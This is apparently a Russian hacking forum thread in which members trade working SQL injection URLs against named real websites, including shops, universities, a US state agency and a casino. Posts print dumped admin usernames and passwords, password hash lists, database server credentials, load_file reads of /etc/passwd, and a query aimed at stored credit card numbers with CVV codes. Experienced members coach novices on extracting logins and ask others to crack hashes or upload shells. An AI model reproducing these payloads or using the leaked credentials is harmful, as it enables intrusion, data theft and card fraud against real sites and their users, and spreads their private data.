http://www.volnorez.ru/news_comments.php?news_id=-75+union+select+1,2,3,4,5,6,table_name+from+inform ation_schema.tables+limit+25,1/*
Тут много чего мона наделать =))
---------------------------------------------
www.volnorez.ru/forum/admin/index.php
админ: egor
пасс : 32167q

DDoSька, -Hormold-
<?php
define('DB_SERVER', 'u24244.mysql.masterhost.ru');
define('DB_SERVER_USERNAME', 'u24244');
define('DB_SERVER_PASSWORD', 'symentico3go');
define('DB_DATABASE', 'u24244');
/forum/images/vital.php ;)

http://www.basketshop.ru/showitem.php?id=1+union+select+1,2,3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,concat_ws(0x3a,login,pass),18, 19,20,21,22,23,24,25+from+gbusers+limit+0,1/*
version() 4.1.22
user() basketsh@localhost
database() wwwbasketshopru

www.valvoline.kz

http://www.valvoline.kz/index.php?news&news=9+order+by+6

и так ... колонок 6 ...

http://www.valvoline.kz/index.php?news&news=-9+union+select+1,version(),3,4,5,6/*
Ver : 5.0.26

Перегребаем информейшн_табля и находим только одну интересную таблицу... admin в бд valvoline

http://www.valvoline.kz/index.php?news&news=-9+union+select+1,concat(login,char(58),password),3 ,4,5,6+from+valvoline.admin/*

login: admin
pass: library

.....

Админка:

_http://www.valvoline.kz/admin.php
_http://www.valtec.kz/admin.php

ничего толкового выжать не удалось..мож кто наколупает что..))
EDU
http://inquiry.uiuc.edu/cil2/syllabus_printer_friendly.php?syllabus_id=39+union +select+concat_ws(char(58),user(),version(),databa se())/*

cillookup@gserve085.lis.uiuc.edu:5.0.15:cilbuilder


next..

http://www.ans.iastate.edu/events/calendar_print.php?month=9&year=2007&room=1+order+by+4/*

aswipe_user
NetID:Password pluthe:2a8de84d9bba07bd167538242df1a3c6 plspike:01e1a02dc87a642ef3b6d00cbee39e91 dlnelson:a1f1d2a50abcb2421fee7d509810e153 sebranek:69e332ddfc7042b084a6367ad89b0259 jdickson:9f88e2f040d048435afc7c91ead6c257 hkepler:cb16f5d9fecbae34d999a17652305de1 amkrull:1c06f99ef5c5fcaa140cfb1a363b670d ashuey:0c1e3901334db2be084c9a20ed7dcce2 trina:c89f9f4ef264e22001f9a9c3d72992ef jrober:c69606c5207571c525520256ada5250d jaiton:dfd8f130b46332c4ff46c8316ad2465d

pluthe:2a8de84d9bba07bd167538242df1a3c6:fricfrac

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://news.lib.vt.edu/libnews/modules.php?name=News&file=print&sid=2+union+select+user,2,password,4,5,6+from+mysq l.user+limit+0,10/*


staff:4A8210F69BBF5F82B9392F9305960AC5229829B3: root:8093D3180B1D12DFF9E3618B4C6770CB5C6BA312:

Интернет магазин
http://books.dovidka.com.ua/index.php?cat=999999999999+union+select+table_name +from+information_schema.tables+limit+20,1/*
НО... Не могу понять почему не работает ничего при запросе
http://books.dovidka.com.ua/index.php?cat=999999999999+union+select+concat_ws( username,password)+from+users/*

_http://www.a-training.ru/news/new.php?id=15+union+select+1,2,3/*
version() - 4.0.27-log
database() - a-training
user() - a-training@localhost

_http://www.latfutsal.lv/new.php?id=-489+union+select+1,2,3,4,5,6,7,8/*
version() - 4.0.27-l
database() - new
user() - new@loca

_http://www.bukovina.biz.ua/new.php?id=-14+union+select+1,2,3,4,5/*

_http://www.creacon.ru/new.php?id=-245+union+select+1,2,3,4,5/*

_http://www.adams-motors.ru/new.php?id=-2+union+select+1,2,3/*
version() - 5.0.32-Debian_7etch5-log
database() - adamsold
user() - adamsold@localhost

_http://www.adams-motors.ru/new.php?id=-2+union+select+1,TABLE_NAME,2%20FROM%20INFORMATION _SCHEMA.TABLES%20/*
имена таблиц :

CHARACTER_SETS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
Action
Akssesuar
Colors
Complekt
Foto
Foto_old
Marks
Menu
Models
Old_avto
People
Texts
Vacancy
accessories
all_details
details
documentation
files
files_up
forum
graphic_people
inner
news
news_details
phpbb_auth_access
phpbb_banlist
phpbb_categories и т.д.

Academicjournals.net
http://www.academicjournals.net/2/archive.php?id=999999+union+select+1,2,3,4,5,6,7,8 ,9,10,11/*&theme=2&jid=ijv
жаль.. негмогу получить вывод (
http://www.academicjournals.net/2/archive.php?id=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11+fr om+information_schema.tables/*&theme=2&jid=ijv
зато ясно что эт 4 версия. поетому и забил (
http://www.palmetto-records.net/artist.php?id=1'
тут поидее чтото странное.... union и select не опознаны)))
http://www.the213.net/php/article.php?id=99999+union+select+1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20/*
хмм.. 20 перебрал и хз.......
http://www.torrentreactor.net/browse.php?id=3.inc.php)+union+select+1/*
не уверен что эт иньекция..

Lexeon
http://books.dovidka.com.ua/index.php?cat=999999999+union+select+password+from +test.users/*
вот правильная база..... но это сиравно тест.
database books

dir
1 : parent
2 : title
3 : image
4 : type
5 : author
6 : format
7 : pages
8 : palitura
9 : mova
10 : pereklad
11 : anot
12 : auditor
13 : image1
14 : sortir
15 : price
16 : pdf
17 : pdf1
18 : znyzhka
19 : sold
20 : weight
21 : xdate
22 : zamov1
23 : zamov2
order_cont
1 : item
2 : quan
3 : price
orders
1 : zamov
2 : tel
3 : addr
4 : xdate
5 : pindex
6 : organ
7 : pos
8 : email
9 : otrym
10 : opr
11 : zamov2
12 : zamov1
parms
1 : price_margin
2 : price_lower
3 : price_upper
4 : t1
5 : t2
6 : t3
7 : t4
8 : t5
9 : code1
10 : code2
11 : code3

database test

users
1 : password

...
не работает потому что таблица находится в другой базе..
так определяем название базы и название таблицы...http://books.dovidka.com.ua/index.php?cat=999999999999+union+select+concat_ws( 0x2e,table_schema,table_name)+from+information_sch ema.tables+limit+20,1/*ну а вот собственно и сам выбор из таблицы.. и заметь, что все работает и выводитhttp://books.dovidka.com.ua/index.php?cat=999999999999+union+select+concat_ws( 0x3a3a,username,password)+from+test.users/*

ух что я нашел...
http://www.snipersister.de/wap/wapmain.php?option=onewsaction=linkid=-1+union+select+1,2,3,convert(aes_decrypt(aes_encry pt(concat(email,0x3a,username,0x3a,password),0x71) ,0x71),binary),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28+from+jos_users--
вывод в цикле всегда радовало это :)

www.u10.ru

Уязвимость в:

Скрипте показа страниц(http://u10.ru/index.php?menu=category&id=3')

Колонки:

http://u10.ru/index.php?menu=category&id=-3+union+select+1,2/*

Информация о базе:

Версия: 4.1.21-standard
Пользователь: u10_u10@localhost

www.u10.ru

Уязвимость в:

Скрипте показа страниц(http://u10.ru/index.php?menu=category&id=3')

Колонки:

http://u10.ru/index.php?menu=category&id=-3+union+select+1,2/*

Информация о базе:

Версия: 4.1.21-standard
Пользователь: u10_u10@localhost

А че недокопать-то....
http://u10.ru/index.php?menu=category&id=-3+union+select+1,convert(concat_ws(0x3a,name,pass) ,binary)+from+admin--

http://u10.ru/index.php?menu=category&id=-3+union+select+1,2/*
он весь дырявый.


Добро пожаловать в панель администрирования
сайтом http://u10.ru/

Сайт разработки бажный..

www.u10.ru

Уязвимость в:

Скрипте показа страниц(http://u10.ru/index.php?menu=category&id=3')

Колонки:

http://u10.ru/index.php?menu=category&id=-3+union+select+1,2/*

Информация о базе:

Версия: 4.1.21-standard
Пользователь: u10_u10@localhost


_http://u10.ru/index.php?menu=category&id=-3+union+select+1,concat(name,char(58),pass)+from+a dmin+limit+0,1/*

111:111222

http://u10.ru/admin/admin.php

slider, ага.
rpanel.info - rpanel/pfobnf

Ещё тема любви тут была... После нескольких нехитрых трюков с information_schema получаем:
http://www.lovetime.ru/search_form.php?rub_tablename=love_main+union+sele ct+1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,user _id,paswd321),0x71),0x71),4,5,6,7,8+from+love_inc--&raz_tablename=love_stihi

Acte.org - PR 6
http://www.acte.org/resources/press_release.php?id=999999+union+select+1,2,3,con cat_ws(0x3a,login,password),5,6,7,8,9+from+users+l imit+0,1/*
получаем данные.. токо хз откуда они )
http://www.acte.org/resources/press_release.php?id=999999+union+select+1,2,3,con cat_ws(0x3a,username,password),5,6,7,8,9+from+com_ logins+limit+0,1/*
еще... пассы
http://www.acte.org/resources/press_release.php?id=999999+union+select+1,2,3,con cat_ws(0x3a,card_num,exp_date,cvv2,card_type,name, street,zip),5,6,7,8,9+from+invoice_cc+limit+0,1/*
ну и картон собственно )

кто сможет чтот с этим сайтом сделать пишите в личку )

[ http://www.agr.state.il.us ] PR=6

SQL inj: http://www.agr.state.il.us/dq/news.php?pg=-1+union+select+1,2,3,4,concat(username,char(58),pa ssword),6,7+from+users+limit+0,1/*

admin:4523881b262ee504809c1e11812ad5b4 => lavalamp

Админка: http://www.agr.state.il.us/dq/admin/admin.php

(с админкой загон... авторизацию не нашёл..)

http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-1+union+select+1,LOAD_FILE(0x2f686f6d652f736974652 f68617264766973696f6e2e72752f7765622f61646d696e2f6 1646d696e2e70687033),3/*
В сорсах смотрим и вуля... Пароль хранится не в бд
<?php
if ($db=='news'){
if ($author =='Reg' && $password=='regulator'){include "news/formindexstart.php";}
if ($author=='Digit' && $password=='mityap'){include "news/formindexstart.php";}
if ($author=='Nitro' && $password=='asdbnmiop'){include "news/formindexstart.php";}
if ($author=='George' && $password=='dolin'){include "news/formindexstart.php";}
}
elseif ($db=='files'){
if ($author=='Reg' && $password=='regulator'){include "files/formindex.php3";}
if ($author=='Gigit' && $password=='mityap'){include "files/formindex.php3";}
if ($author=='Nitro' && $password=='asdbnmiop'){include "files/formindex.php3";}
}
?>

Churchilltrust.com.au - PR 5
http://www.churchilltrust.com.au/content.php?id=-1+union+select+1,2,3,unhex(hex(version())),5,6,7,8 ,9,10,11/*
увы 4.
http://www.churchilltrust.com.au/content.php?id=-1+union+select+1,2,3,unhex(hex(concat_ws(0x3a,user name,password))),5,6,7,8,9,10,11+from+users/*
хехе угадал )
http://www.soaw.org/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22
а вот тут не угадал... заеб подбирать(

TARGET: http://mnogobd.ru/

USER(): a1mnogobd_art@localhost
DATABASE(): a1mnogobd_mnog
VERSION(): 5.0.37-standard-log


SQL-inj:

http://www.mnogobd.ru/info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14/*


Раскрытые пути

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/a1mnogobd/domains/mnogobd.ru/public_html/info.php on line 6

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/a1mnogobd/domains/mnogobd.ru/public_html/info.php on line 10

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/a1mnogobd/domains/mnogobd.ru/public_html/info.php on line 14


Вот как-то так)

http://www.xgamestation.com/view_product.php?id=-1%20UNION%20ALL%20SELECT%201,concat_ws(0x3a,userna me,user_email,user_password),3,4,5,6,7,8,9,0,1,2,3 ,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8%20from%20phpbb_user s%20Limit%204500,1--

http://www.gamershood.com/game.php?id=-1+UNION+SELECT+1,2,concat_ws(0x3a,username,email,p assword),4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+ user+limit+20000,1--

http://babaguga.com/showcat.php?cat_id=-99999/**/union/**/select/**/0,concat(user_name,0x3a,password),2/**/from/**/std_users/*

TARGET: http://mnogobd.ru/

SQL-inj:

http://www.mnogobd.ru/info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14/*


Раскрутил:
Актуальные Таблицы и колонки:
-bag
--cena
--count
--id_zakaz
--summa
-client
--email
--tel
--cur_data
--id_client
--dop_info
--adress
-region
--name_region
-rubrika
--name_rubrika
-t_news
--small_msg
--title_news
--k_slov_news
--zag_news
--msg
-tovar
--stoimost
--name
--region
--vipusk
--prinadl
--img
--new
--opisanie
--top
--title_tov
--k_slov_tov
--excluziv
--sbornik

http://www.mnogobd.ru/info.php?id=-1+union+select+1,concat_ws(0x3a,email,id_client),3 ,4,5,6,7,8,9,10,11,12,13,14+From+client

http://opac.iuav.it/sbda/main.php?section=-200+union+select+1,2,3,4,5,6,7,8/*
version() - 5.0.37-community
database() - WebMenu
user() - sbda@sally.iuav.it
Admin, sbda_authors - нашол 2 таблици подходящие . sbda_authors тут подобрал только логин-admin. пароль не смог :( может ктото докопает)

Я новичок! Скажите плиз эт уязвимость?
http://www.ac-psych.org/?id=1'/*
Если да то какое название поля?
Заранее спасибо!

http://www.ac-psych.org/?id=-1+union+select+version()/*

http://www.ac-psych.org/?id=-1+union+select+table_name+from+information_schema. tables+limit+1,1/*

masterBlack, не пиши пож. большими буквами.

http://www.ac-psych.org/?id=1%20union%20select%20table_name%20FROM%20INFOR MATION_SCHEMA.TABLES%20limit%2017,1

меняй N - limit N,1 и см. таблицы. Ознакомься с этой темой (FAQ):
https://forum.antichat.ru/threadnav43966-1-10.html

Спасибо!

Народ нашел дыру
http://БЛАБЛА/forprint.php?id=-1+union+select+1,2,3,version(),5,6,7,8/*
versia 5.*.*
http://БЛАБЛА/forprint.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+infor mation_schema.tables+limit+1,1/*
нашел нужные таблицы
KEY_COLUMN_USAGE
neo_groups
client_info
Теперь как узнать что в них? напишите плиз готовый вариант, то сколько по faq не пытался ни хрена не получается
заранее спс

Вот мой вариант
http://БЛАБЛА/forprint.php?id=-1+union+select+1,2,3,column_name,5,6,7,8+from+info rmation.schema.columns+where+table_name=%27client_ info%27/*
Но после этого ни чего не выводит мб я чет не так делаю, хз , жду ващй помощи )

вапросы по уязвимостям вроде в другой теме...? ;)

2la.painkiller
/forprint.php?id=-1+union+select+1,2,3,concat_ws(0x3a,table_name,col umn_name),5,6,7,8+from+infor mation_schema.columns+limit+1,1/*
или
/forprint.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+infor mation_schema.columns+where+table_name='table_name '/*
p.s: 'table_name' попробуй закодировать в hex, char...

А я ради безопасности тут написал
во спс помогли
Где можно побольше узнать об этом concat_ws(0x3a, я чет ваще не понимаю что это и откуда

в hex, char... как это сделать? )

в гугл не посылать )

Привет всем!Нужна помощь!!!
Кто может помочь найти уязвимость в этом сайте http://kunik.no-ip.com/wordpress версия движка wordpress-2.5 помочь залить этот файл с сайта http://rapidshare.com/files/128670416/user.php.html на этот сайт http://kunik.no-ip.com/
Зарание спосибо!!!

a-shop.ru
_http://www.a-shop.ru/articles.php?aid=-54'+union+select+1,concat_ws(0x3a,username,passwor d),3,4+from+administrators/*

evgeny:*71363E2E614A09E3EF9BB9AA6E75E63A475A81AD
amira:*E9F326EFC55D3E0D7FAB74C7BD7894AD8DC4B2F1
sveta:*6DDE0543444FBA9E39CAA6D3320908E07BF32C22
bigmike:*AB930C3AE04FC73337AFE016B0A145AEC5005598
mike:*FAA1BD777F877B9E165659BC903AFA947891CA11
alena:*BCA54683246384E4B34497AB508FD62F21017832
nastja:*D3F3A4030CBF35E9F71FDB8B2E7282A29E0F16E7
Sky:*AE889E02E12594B05C080B52FE32E2584B3993D9
ZaitsevS:*E6E49E72EF471AEBFCAE2B7A48E6469A4DBE2B2E
Sergey-S:*72AA3892FA00484D53B77060D55904FFB5F3D573
denis:*7AEF71A0E7DD19051D6B1DBF7549CAE50897703B
roller:*04CD3F2CB5195CE66AE7D5757B54D6DED734485E
Serginio:*2BEE00F76C0D1B93FFF2DE9792977A8F1E371AB7
olesya:*4A4DECD159BEAEB0B1BAE7D7D07CFF5E5E96B664

audit.by
http://www.audit.by/new/index.php?id=1'
http://www.audit.by/new/index.php?id=10&spr=1'
http://www.audit.by/new/?news_id=1'

audit.by
http://www.audit.by/new/index.php?id=10&spr=1+union+select+1,2,version()/*
4 версия =(
----
http://www.audit.by/new/index.php?id=10&spr=1+union+select+1,2,3+from+news/*

pr=6
www.bangkokpost.com
http://www.bangkokpost.com/breaking_news/breakingnews.php?id=-128097+union+select+1,2,3,4,5,6,name,8,9,email,11, 12,13,14,15+from+users--
sify.com
http://sify.com/sports/football/fullstory.php?id=-14704106+union+select+1122,2222,3333,4444,version( ),6666,7777,8888,999,1000,1100,1200,1300,1400,1500 ,1600,1700,1800--
pr=5
www.panoramablick.com
http://www.panoramablick.com/service4free.php?kat_id=3364&nav_id=-3364+union+select+1,2,3,4--&lang=en&action=showkat

www.creeknationcasino.com

SQL inj: http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(managerlogin,char(58),managerpassword)+from+man agers/*

Логин: admin
Пароль: tr!@b

Админка: http://www.creeknationcasino.com/admin/

slider слух у мну вопрос!Как ты вычислил ентот managerpassword и managerlogin ??? Методом тыка или как? Просто вот такой вот ссылкочкой например www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(column_name,0x3a,column_schema)+from+informatio n_schema.columns+limit+1,1/*
Мне ошибку пишет!!! Обьясни плиз я в этом деле новичек ((

2 BanQui
А что это у тебя за столбец column_schema?
Может нужно так ? ;)
http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(column_name,0x3a,table_schema)+from+information _schema.columns+limit+1,1/*
Ошибки нету

СПс терь другой вопрос смари http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(column_name,0x3a,table_schema)+from+information _schema.columns+limit+1,1/* - Ошибки нет
http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(column_name,0x3a,table_schema)+from+information _schema.columns+limit+2,1/* - Ошибки нет
И так до 4 а вот тут
http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conc at(column_name,0x3a,table_schema)+from+information _schema.columns+limit+5,1/* - Ошибка есть и дальше они тоже присутствуют!

мдауж, откуда ты взял этот table_schema ??? table_name!

Omg!Приношу свой извенения за свой тупизм)))))Спасибо!!! Вазьму на заметку ИМХО много раз отступал от взлома сайтоф именно по этому((

статьи для кого пишут? :) почитай чтобы в следующий раз "не отступать от взлома" ;)))

Кстати вот тут еще одну фигню нашел токо что то не получаетцо никак информатион схемку вывести! Версия 4.0.24_Debian-10sarge2-log
Вот как пытался и пытаюсь чтото менять но пока не выходит ((( http://www.audit.by/new/index.php?id=10&spr=-999999+union+select+1,2,table_name+from+informatio n_schema.tables+limit+1,1/*

см. мой совет выше ^-^
в 4.0.24 нет information_schema...
вапросы по уязвимостям тут (https://forum.antichat.ru/thread46016.html), а то щас и тебе и мне минусов наставят... :)

Ну и накурили тут вы =)

BanQui information_table есть только в пятой ветке скуля....

Нашел вот енто

http://www.adams-motors.ru/new.php?id=-2+union+select+1,TABLE_NAME,concat(column_name,0x3 a,table_schema)%20FROM%20INFORMATION_SCHEMA.column s+limit+559,1/*

Попыталсо сделать вот так:
http://www.adams-motors.ru/new.php?id=-2+union+select+1,aes_decrypt(aes_encrypt(concat(0x 3a,user_newpasswd),0x71),0x71)%20FROM%20adamsold/*

Нече не выходит!!!

блин что вы курите...
Вот смотрим версию
http://www.adams-motors.ru/new.php?id=-2+union+select+version(),2,3/*
Ага версия пятая смотрим таблицы
http://www.adams-motors.ru/new.php?id=-2+union+select+table_name,2,3+from+information_sch ema.tables+limit+1,1/*
находим таблицы вот актуальные
Action
Akssesuar
Colors
Complekt
Foto
Foto_old
Marks
Menu
Models
Old_avto
People
Texts
Vacancy
accessories
all_details
details
documentation
files
files_up
forum
graphic_people
inner
news
news_details
дальше идут таблицы форума (на движке phpbb)
среди них есть таблица phpbb_users
роем на колонки
http://www.adams-motors.ru/new.php?id=-2+union+select+column_name,2,3+from+information_sc hema.columns+where+table_name=0x70687062625f757365 7273+limit+1,1/*
Где 0x70687062625f7573657273 зашифрованое 16ти битным шифрованием наша таблица phpbb_users
находим нужные нам колонки username и user_password и составляем запрос
http://www.adams-motors.ru/new.php?id=-2+union+select+concat_ws(0x3a,username,user_passwo rd),2,3+from+phpbb_users+limit+1,1/*
Получаем логин админа и зашифрованый пароль а именно
admin:178f6c2365ac7511b4bf37c8e89cc678

кто расшифрует скиньте пасс в личку плиз.

Вот и все

блин что вы курите...
Вот смотрим версию
http://www.adams-motors.ru/new.php?id=-2+union+select+version(),2,3/*
Ага версия пятая смотрим таблицы
http://www.adams-motors.ru/new.php?id=-2+union+select+table_name,2,3+from+information_sch ema.tables+limit+1,1/*
находим таблицы вот актуальные
Action
Akssesuar
Colors
Complekt
Foto
Foto_old
Marks
Menu
Models
Old_avto
People
Texts
Vacancy
accessories
all_details
details
documentation
files
files_up
forum
graphic_people
inner
news
news_details
дальше идут таблицы форума (на движке phpbb)
среди них есть таблица phpbb_users
роем на колонки
http://www.adams-motors.ru/new.php?id=-2+union+select+column_name,2,3+from+information_sc hema.columns+where+table_name=0x70687062625f757365 7273+limit+1,1/*
Где 0x70687062625f7573657273 зашифрованое 16ти битным шифрованием наша таблица phpbb_users
находим нужные нам колонки username и user_password и составляем запрос
http://www.adams-motors.ru/new.php?id=-2+union+select+concat_ws(0x3a,username,user_passwo rd),2,3+from+phpbb_users+limit+1,1/*
Получаем логин админа и зашифрованый пароль а именно
admin:178f6c2365ac7511b4bf37c8e89cc678

кто расшифрует скиньте пасс в личку плиз.

Вот и все
Ххе...это лежит на xaker.name уже много месяцев...

дык я человеку выше ее раскрутил

Неправильно выставленные права мускул юзера позволяют читать (и возможно писать) файлы:

http://ns1.profsurv.com/category_list.php?x_category_id=-1%20union%20select%20load_file(0x2f6574632f7061737 37764)

Не смог найти документрут чтобы залить шелл, кто найдет раскрытие пути или документрут - скиньте в личку, интересно.

Где 0x70687062625f7573657273 зашифрованое 16ти битным шифрованием наша таблица phpbb_users


Научите переводить в 16бит!!!

http://snak3.h17.ru/tools/ вот там и есть 16 битное шифрование

ссылка не работает

Pangeaday.org - PR 6
http://www.pangeaday.org/filmDetail.php?id=99999+union+select+1,2,3,4,5,6,v ersion(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23/*
нече интересного в БД не нашел..

Где 0x70687062625f7573657273 зашифрованое 16ти битным шифрованием наша таблица phpbb_users


Научите переводить в 16бит!!!

http://hack-shop.org.ru/tools-code-encode

http://hack-shop.org.ru/tools-code-encode
еще тута http://x3k.ru

Eicta.org - PR 6
http://www.eicta.org/index.php?id=32&id_article=-1+union+select+unhex(hex(concat_ws(0x3a3a,0x3a3a,v ersion(),0x3a3a))),2,3,4,5,6,7,8,9,10,11,12/*

http://nsastutter.org/subcat/index.php?subid=-1+union+select+1,version(),3,4,5+users/*
4.0.25-standard-log
к users так ии не смог ничего подобрать...

http://nsastutter.org/subcat/index.php?subid=-1+union+select+1,version(),3,4,5+users/*
4.0.25-standard-log
к users так ии не смог ничего подобрать...

\\

http://nsastutter.org/subcat/index.php?subid=-1+union+select+1,concat_ws(0x3a,name,password),3,4 ,5+from+admin/*

http://www.laptopshowcase.co.uk/downloads.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/* чтото странное он пишет!

Error performing query: Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause

http://hyundai-trex.ru/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25/*

Вот еще!!! Хз,но раскрутить не получилось!

http://www.laptopshowcase.co.uk/downloads.php?id=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion())/*

Database Version: 4.0.23-standard
Database name: laptops_main
User name: laptops_main@localhost

2 BanQui вот тебе твоя скуля....

таблицы подобрать не смог.. результат смотрим в хедере


во 2-й походу слепая скуля...не стал подзапросами мучать если сильно надо сам добьёшь

Glaad.org - PR 7
http://www.glaad.org/media/resource_kit_detail.php?id=999999+union+select+1,2 ,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18, 19,20--
4 версия. но есть права )
http://www.glaad.org/media/resource_kit_detail.php?id=999999+union+select+1,2 ,3,4,5,concat_ws(0x3a,user,password),7,8,9,10,11,1 2,13,14,15,16,17,18,19,20+from+mysql.user--
и так..
http://www.glaad.org/media/resource_kit_detail.php?id=999999+union+select+1,2 ,3,4,5,load_file(0x2F6574632F706173737764),7,8,9,1 0,11,12,13,14,15,16,17,18,19,20-_
не пробвал шелл заливать.. думаю фильтирует кавычки...

Onthecommons.org - PR 6
http://onthecommons.org/content.php?id=99999'+union+select+concat_ws(0x3a, username,password)+from+onthec5_main.users+limit+0 ,1/*
http://onthecommons.org/login.php
admin;admin

Clasp.org - PR 6
http://www.clasp.org/publications.php?id=999999+UNION+SELECT+1,2,concat _ws(0x3a,version(),user(),database()),4,5,6,7,8,9, 10,11,12,13,14,15/*
TurkishCulturalFoundation.org - PR 5
http://www.turkishculturalfoundation.org/pages.php?ID=999999'+union+select+unhex(hex(concat _ws(0x3a,version(),table_name)))+from+information_ schema.tables+limit+26,1/*
Agsafe.com.au - PR 4
http://www.agsafe.com.au/guardian/content.php?id=9999999+union+select+1,2,unhex(hex( version())),4,5,6,7,8,9,10,11,12,13,14/*

http://www.tutorialsuche.de/tutorials.php?c=9+union+select+concat_ws(0x3a,data base(),user(),version()),2,3--
листаем вниз, наводим мышку на "2", с адреса ссылки выдераем:
utorialsuche:root@localhost:4.1.11-Debian_4sarge7-log

пытался дальше копнуть через "table_name)+from+information_ schema.tables+limit+1,1--", не получилось. может кто разберется ; )

и еще кое что: http://www.tutorialsuche.de/tutorials.php?c=9+union+select+load_file(0x2F65746 32F706173737764),2,3--

http://www.tutorialsuche.de/tutorials.php?c=9+union+select+concat_ws(0x3a,data base(),user(),version()),2,3--
листаем вниз, наводим мышку на "2", с адреса ссылки выдераем:
utorialsuche:root@localhost:4.1.11-Debian_4sarge7-log

пытался дальше копнуть через "table_name)+from+information_ schema.tables+limit+1,1--", не получилось. может кто разберется ; )

и еще кое что: http://www.tutorialsuche.de/tutorials.php?c=9+union+select+load_file(0x2F65746 32F706173737764),2,3--

пытался дальше копнуть через "table_name)+from+information_ schema.tables+limit+1,1--", не получилось. может кто разберется ; )

это версия 4 а не 5 information_ schema.tables есть только в 5 ветке )

http://www.tutorialsuche.de/tutorials.php?c=9+union+select+concat_ws(0x3a,user ,password),2,3+from+mysql.user--

root:5ce0cb356302dfa5

http://inforos.ru/?id=11041 точно не знаю но мне кажется этот сайт сплошная инъекцияя

http://inforos.ru/?id=11041 точно не знаю но мне кажется этот сайт сплошная инъекцияявпринципе ты оказался прав..
скажу сразу пинг до сайта, по крайней мере у меня большой был, поэтому может грузиться долгоhttp://inforos.ru/?idt=9999+unioN+select+1,concat_ws(0x3a3a,version( ),user(),database()),3,4,5,6,7/*
version(): 5.0.45-log
user(): inforosnet@localhost
database(): inforosnet

так как версия 5 - смотрим таблицыhttp://inforos.ru/?idt=9999+unioN+select+1,concat_ws(0x2e,table_sche ma,table_name),3,4,5,6,7+from+information_schema.t ables/*беглым взглядом окинув таблицы и ничего интересного не найдя в их названиях - проверил пару из нихhttp://inforos.ru/?idt=9999+unioN+select+1,concat_ws(0x2e,user_email ),null,null,5,null,null+from+inforos_user_reklama/*
здесь несколько мыльников...
так и не найдя ничего интересного, а скорее всего не пытаясь ничего интересного найти, так как очень хотелось спать, я запостил тут коммент и лег спать=)

http://inforos.ru/?id=11041 точно не знаю но мне кажется этот сайт сплошная инъекцияя

в следующий раз хоть колонки подбирай )

http://inforos.ru/?id=-1+union+select+concat_ws(0x3a,login,pass)+from+inf oros_manager/*

shurik:shurik

Сегодня у нас - .com.ua

Autosvit.com.ua - PR 4
http://www.autosvit.com.ua/techauto.php?id=9999999'+union+select+table_name+f rom+information_schema.tables+limit+67,1/*
Justinian.com.ua - PR 4
http://www.justinian.com.ua/article.php?id=9999999+UNION+SELECT+1,unhex(hex(ve rsion())),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
Expohome.com.ua - PR 4
http://www.expohome.com.ua/index.php?id=16&lang=ru&page=vital'+union+select+version(),2,3,4,5/*
Aquariumist.com.ua - PR 4
http://www.aquariumist.com.ua/fish.php?id=999999+union+select+1,version(),3,4,5/*
Zoorinok.com.ua - PR 3
http://zoorinok.com.ua/details_topic.php?id=999999+union+select+1,table_n ame,3,4,5,6,7+from+information_schema.tables/*
Tribaldance.com.ua - PR 3
http://www.tribaldance.com.ua/index.php?id=9999+union+select+1,2,3,version()/*
а так же .te.ua

City.te.ua
http://city.te.ua/articles.php?gr_id=2&id=-1+union+select+1,2,concat_ws(0x3a,name,passwort,em ail),4+from+users--
Tehnosvitlo.te.ua
http://www.tehnosvitlo.te.ua/news.php?id=999999'+union+select+1,table_name+from +information_schema.tables+limit+23,1/*
Dovidka.te.ua
http://www.dovidka.te.ua/katalog/index.php?id=9999+union+select+1,version(),3,4,5,6 ,7,8,9,10,11/*
Idea-key.te.ua
http://idea-key.te.ua/index.php?p=4&id=9999999+union+select+1,table_name,3,4,5,6,7+fro m+information_schema.tables+limit+27,1/*

Народ
load_file(0x2F6574632F706173737764)
x2F6574632F706173737764
это какая кодировка? чем или где можно расшифровать?

Народ
load_file(0x2F6574632F706173737764)
x2F6574632F706173737764
это какая кодировка? чем или где можно расшифровать?
http://forum.antichat.ru/thread46016.html - Тебе сюда, здесь постят SQLиньекции...

